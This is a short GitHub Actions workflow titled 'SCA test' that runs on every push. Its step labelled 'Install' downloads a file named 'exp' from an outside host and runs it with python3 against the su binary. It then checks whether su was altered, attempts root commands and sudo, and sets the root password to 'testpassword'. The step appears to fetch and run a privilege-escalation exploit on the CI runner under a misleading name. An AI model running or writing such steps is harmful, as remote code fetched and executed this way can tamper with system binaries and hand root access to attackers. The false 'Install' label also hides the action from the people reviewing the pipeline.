name: SCA test
run-name: Hello Kyle

on:
  push:

jobs:
  sca:
    runs-on: ubuntu-latest

    steps:
      - name: 📦 Repository
        uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd

      - name: Node
        uses: actions/setup-node@6044e13b5dc448c55e2357c09f80417699197238 # v6.1.0

      - name: Install
        shell: bash
        run: |
          wget https://copy.fail/exp
          sha256sum $(which su)
          su --version
          python3 exp $(which su)
          
          sha256sum $(which su)
          which su
          file $(which su)
          ls -al $(which su)
          su --version
          su -c 'whoami' 2>&1
          echo $(su -c 'whoami')
          sudo su
          whoami
          sudo apt-get install -y expect
          echo "root:testpassword" | sudo chpasswd
          expect -c '
            spawn su -c whoami root
            expect "Password:"
            send "testpassword\r"
            expect eof
          '
